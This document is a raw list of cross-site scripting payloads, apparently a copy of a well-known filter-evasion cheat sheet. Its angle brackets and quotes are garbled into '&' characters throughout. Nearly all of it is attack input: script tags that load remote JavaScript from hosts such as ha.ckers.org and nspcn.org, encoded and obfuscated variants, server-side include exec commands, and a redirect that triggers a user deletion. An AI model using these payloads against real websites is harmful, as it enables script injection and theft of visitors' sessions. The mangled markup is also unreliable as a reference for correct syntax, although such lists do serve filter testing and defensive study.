&BGSOUND SRC=&javascript:alert('XSS');&&&
&br size=&&{alert('XSS')}&&&
&LAYER SRC=&http://www.nspcn.org/xss/a.js&&&/layer&&
&LINK REL=&stylesheet& HREF=&javascript:alert('XSS');&&&
&IMG SRC='vbscript:msgbox(&XSS&)'&&
&IMG SRC=&mocha:[code]&&&
&IMG SRC=&livescript:[code]&&&
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=javascript:alert('XSS');&&&
&IFRAME SRC=javascript:alert('XSS')&&/IFRAME&&
&FRAMESET&&FRAME SRC=javascript:alert('XSS')&&/FRAME&&/FRAMESET&&
&TABLE BACKGROUND=&javascript:alert('XSS')&&&
&DIV STYLE=&background-image: url(javascript:alert('XSS'))&&&
&DIV STYLE=&behaviour: url('http://www.how-to-hack.org/exploit.html');&&&
&DIV STYLE=&width: expression(alert('XSS'));&&&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS&)';&/STYLE&&
&IMG STYLE='xss:expre\ssion(alert(&XSS&))'&&
&STYLE TYPE=&text/javascript&&alert('XSS');&/STYLE&&
&STYLE TYPE=&text/css&&.XSS{background-image:url(&javascript:alert('XSS')&);}&/STYLE&&A CLASS=XSS&&/A&&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert('XSS')&)}&/STYLE&&
&BASE HREF=&javascript:alert('XSS');//&&&
getURL(&javascript:alert('XSS')&)&
a=&get&;b=&URL&;c=&javascript:&;d=&alert('XSS');&;eval(a+b+c+d);&
&XML SRC=&javascript:alert('XSS');&&&
&& &BODY ONLOAD=&a();&&&SCRIPT&function a(){alert('XSS');}&/SCRIPT&&&&
&SCRIPT SRC=/384.jpg&&&/SCRIPT&&
&IMG SRC=&javascript:alert('XSS')&&
&!--#exec cmd=&/bin/echo '&SCRIPT SRC'&--&&!--#exec cmd=&/bin/echo '=http://www.nspcn.org/xss/a.js&&/SCRIPT&'&--&&
&SCRIPT a=&&& SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT =&&& SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT a=&&& '' SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT &a='&'& SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&SCRIPT&document.write(&&SCRI&);&/SCRIPT&PT SRC=&http://www.nspcn.org/xss/a.js&&&/SCRIPT&&
&A HREF=http://www.go//&link&/A&&
&!--[if true]&&img onerror=alert(1) src=--&
&form action=javascript:alert(1)&&input type=submit&
&input autofocus onfocus=alert(1)&
&select autofocus onfocus=alert(1)&
&textarea autofocus onfocus=alert(1)&
&keygen autofocus onfocus=alert(1)&
&img src=1 language=vbs onerror=msgbox+1&
&img src=1 language=vbscript onerror=msgbox+1&
&img src=1 onerror=vbs:msgbox+1&
&b/alt=&1&onmouseover=InputBox+1 language=vbs&test&/b&
&iframe onreadystatechange=alert(1)&
&style onreadystatechange=alert(1)&
&script onreadystatechange=alert(1)&&/script&
&iframe onreadystatechange=alert(1)&&/iframe&
&style onreadystatechange=alert(1)&&/style&
&xml onreadystatechange=alert(1)&
&xml onreadystatechange=alert(1)&test&/xml&
&object type=image src=/565.gif onreadystatechange=alert(1)&&/object&
&img type=image src=/565.gif onreadystatechange=alert(1)&
&image type=image src=/565.gif onreadystatechange=alert(1)&
&input type=image src=/565.gif onreadystatechange=alert(1)&
&isindex type=image src=/565.gif onreadystatechange=alert(1)&
&object data=anything_at_all.pdf&&param name=src value=&http://p42.us/xss.pdf&&&/param&&/object&
&img src=&x onerror=alert(1)//[^&]* &&
&a href='data:text/xml,&?xml version=&1.0& encoding=&UTF-8&?&&!DOCTYPE html [ &!ENTITY inject &<script>alert(1)</script>&&]&&html xmlns=&http://www.w3.org/1999/xhtml&&&&/html&'&haha&/a&
This used to work on Firefox <= 3.0 (XBL binding loaded via -moz-binding from a data: stylesheet):
@import 'data:text/css,* { -moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss) }';
expressions I could go on all night :)
&div style=&xss:exp\00ression(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\73:\70\73\6f\006e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\ \0073: \ \ \ \ \006f \006e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&xss:\078\\\\e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&xs\0s:e\x\pression\(window.x?0:(alert(/XSS/),window.x=1)\);&&&/div&
&div style=&\73:\;\;\;\;\;\;\;\;\006f&#6e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\73&#62&#58&#92&#48&#48&#54&#53&#92&#48&#48&#55&#56&#92&#48&#48&#55&#48&#92&#48&#48&#55&#50&#92&#48&#48&#54&#53&#92&#48&#48&#55&#51&#92&#48&#48&#55&#51&#92&#48&#48&#54&#57&#92&#48&#48&#54&#102&#92&#48&#48&#54&#101(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\8\3s:e\xp/*tbeorhf*/ression(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
Encoded comments:-
&div style=&xss:ex/*OMG*/pression(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
The VB example doesn't require () :-
&IMG SRC=a onerror='vbscript:msgbox&XSS&'&
And how about vbs:&
&img src=1 onerror=&vbs:MsgBox 1&&
&?xml version=&1.0& encoding=&utf-7&?&+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&
&ſcript&
&SCRIPT SRC=http://ha.ckers.org/xss.js&&/SCRIPT&
&IMG SRC=&javascript:alert('XSS');&&
&IMG SRC=javascript:alert('XSS')&
&IMG SRC=JaVaScRiPt:alert('XSS')&
&IMG SRC=javascript:alert(&XSS&)&
&IMG SRC=`javascript:alert(&RSnake says, 'XSS'&)`&
&IMG &&&&&SCRIPT&alert(&XSS&)&/SCRIPT&&&
&IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&
&IMG SRC=javascript:alert('XSS')&
&IMG SRC=&#08&#09&#02&#07&#04&#09&#03&#00041&
&IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&
&IMG SRC=&jav ascript:alert('XSS');&&
&IMG SRC=&jav	ascript:alert('XSS');&&
&IMG SRC=&jav
ascript:alert('XSS');&&
&IMG SRC=&jav
ascript:alert('XSS');&&
&IMG SRC=&  &javascript:alert('XSS');&&
&SCRIPT/XSS SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(&XSS&)&
&SCRIPT/SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&&SCRIPT&alert(&XSS&);//&&/SCRIPT&
&SCRIPT SRC=http://ha.ckers.org/xss.js?&B&
&SCRIPT SRC=//ha.ckers.org/.j&
&IMG SRC=&javascript:alert('XSS')&
&iframe src=http://ha.ckers.org/scriptlet.html &
&SCRIPT&a=/XSS/
alert(a.source)&/SCRIPT&
\&;alert('XSS');//
&/TITLE&&SCRIPT&alert(&XSS&);&/SCRIPT&
&INPUT TYPE=&IMAGE& SRC=&javascript:alert('XSS');&&
&BODY BACKGROUND=&javascript:alert('XSS')&&
&BODY ONLOAD=alert('XSS')&
&IMG DYNSRC=&javascript:alert('XSS')&&
&IMG LOWSRC=&javascript:alert('XSS')&&
&BGSOUND SRC=&javascript:alert('XSS');&&
&BR SIZE=&&{alert('XSS')}&&
&LAYER SRC=&http://ha.ckers.org/scriptlet.html&&&/LAYER&
&LINK REL=&stylesheet& HREF=&javascript:alert('XSS');&&
&LINK REL=&stylesheet& HREF=&http://ha.ckers.org/xss.css&&
&STYLE&@import'http://ha.ckers.org/xss.css';&/STYLE&
&META HTTP-EQUIV=&Link& Content=&&http://ha.ckers.org/xss.css&; REL=stylesheet&&
&STYLE&BODY{-moz-binding:url(&http://ha.ckers.org/xssmoz.xml#xss&)}&/STYLE&
&XSS STYLE=&behavior: url(xss.htc);&&
&STYLE&li {list-style-image: url(&javascript:alert('XSS')&);}&/STYLE&&UL&&LI&XSS
&IMG SRC='vbscript:msgbox(&XSS&)'&
&IMG SRC=&mocha:[code]&&
&IMG SRC=&livescript:[code]&&
?script?alert(¢XSS¢)?/script?
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=javascript:alert('XSS');&&
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=data:text/base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&&
&META HTTP-EQUIV=&refresh& CONTENT=&0; URL=http://;URL=javascript:alert('XSS');&&
&IFRAME SRC=&javascript:alert('XSS');&&&/IFRAME&
&FRAMESET&&FRAME SRC=&javascript:alert('XSS');&&&/FRAMESET&
&TABLE BACKGROUND=&javascript:alert('XSS')&&
&TABLE&&TD BACKGROUND=&javascript:alert('XSS')&&
&DIV STYLE=&background-image: url(javascript:alert('XSS'))&&
&DIV STYLE=&background-image:\6C\6a\61\72\74\003a\65\28.53\29'\0029&&
&DIV STYLE=&background-image: url(javascript:alert('XSS'))&&
&DIV STYLE=&width: expression(alert('XSS'));&&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS&)';&/STYLE&
&IMG STYLE=&xss:expr/*XSS*/ession(alert('XSS'))&&
&XSS STYLE=&xss:expression(alert('XSS'))&&
exp/*&A STYLE='no\xss:noxss(&*//*&);
xss:ex/*XSS*//*/*/pression(alert(&XSS&))'&
&STYLE TYPE=&text/javascript&&alert('XSS');&/STYLE&
&STYLE&.XSS{background-image:url(&javascript:alert('XSS')&);}&/STYLE&&A CLASS=XSS&&/A&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert('XSS')&)}&/STYLE&
&!--[if gte IE 4]&
&SCRIPT&alert('XSS');&/SCRIPT&
&![endif]--&
&BASE HREF=&javascript:alert('XSS');//&&
&OBJECT TYPE=&text/x-scriptlet& DATA=&http://ha.ckers.org/scriptlet.html&&&/OBJECT&
&OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-&&param name=url value=javascript:alert('XSS')&&/OBJECT&
----------------------------------------------------------------------------------------------
&EMBED SRC=&http://ha.ckers.org/xss.swf& AllowScriptAccess=&always&&&/EMBED&
----------------------------------------------------------------------------------------------
&EMBED SRC=&data:image/svg+base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDA3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==& type=&image/svg+xml& AllowScriptAccess=&always&&&/EMBED&
----------------------------------------------------------------------------------------------
b=&URL(\&&;
c=&javascript:&;
d=&alert('XSS');\&)&;
eval(a+b+c+d);
----------------------------------------------------------------------------------------------
&HTML xmlns:xss&
& &?import namespace=&xss& implementation=&http://ha.ckers.org/xss.htc&&
& &xss:xss&XSS&/xss:xss&
&XML ID=I&&X&&C&&![CDATA[&IMG SRC=&javas]]&&![CDATA[cript:alert('XSS');&&]]&
&/C&&/X&&/xml&&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&
&XML ID=&xss&&&I&&B&&IMG SRC=&javas&!-- --&cript:alert('XSS')&&&/B&&/I&&/XML&
&SPAN DATASRC=&#xss& DATAFLD=&B& DATAFORMATAS=&HTML&&&/SPAN&
&XML SRC=&xsstest.xml& ID=I&&/XML&
&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&
----------------------------------------------------------------------------------------------
&HTML&&BODY&
&?xml:namespace prefix=&t& ns=&urn:schemas-microsoft-com:time&&
&?import namespace=&t& implementation=&#default#time2&&
&t:set attributeName=&innerHTML& to=&XSS&SCRIPT DEFER&alert(&XSS&)&/SCRIPT&&&
&/BODY&&/HTML&
----------------------------------------------------------------------------------------------
&SCRIPT SRC=/420.jpg&&&/SCRIPT&
&!--#exec cmd=&/bin/echo '&SCR'&--&&!--#exec cmd=&/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&&/SCRIPT&'&--&
&? echo('&SCR)';
echo('IPT&alert(&XSS&)&/SCRIPT&'); ?&
&IMG SRC=&/somecommand.php?somevariables=maliciouscode&&
Redirect 302 /a.jpg /admin.asp&deleteuser
&META HTTP-EQUIV=&Set-Cookie& Content=&USERID=&SCRIPT&alert('XSS')&/SCRIPT&&&
&HEAD&&META HTTP-EQUIV=&CONTENT-TYPE& CONTENT=&text/ charset=UTF-7&& &/HEAD&+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
----------------------------------------------------------------------------------------------
&SCRIPT a=&&& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT =&&& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT a=&&& '' SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT &a='&'& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT a=`&` SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT a=&&'&& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT&document.write(&&SCRI&);&/SCRIPT&PT SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
----------------------------------------------------------------------------------------------
&A HREF=&http://66.102.7.147/&&XSS&/A&
&A HREF=&http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&&XSS&/A&
&A HREF=&http:///&&XSS&/A&
&A HREF=&http://0x42.0xx7.0x93/&&XSS&/A&
&A HREF=&http://07./&&XSS&/A&
&A HREF=&h
tt p://6	6.x7.147/&&XSS&/A&
&A HREF=&///&&XSS&/A&
&A HREF=&//google&&XSS&/A&
&A HREF=&http://ha.ckers.org@google&&XSS&/A&
&A HREF=&http://google:ha.ckers.org&&XSS&/A&
&A HREF=&/&&XSS&/A&
&A HREF=&./&&XSS&/A&
&A HREF=&javascript:document.location='/'&&XSS&/A&
&A HREF=&http://www.go//&&XSS&/A&}
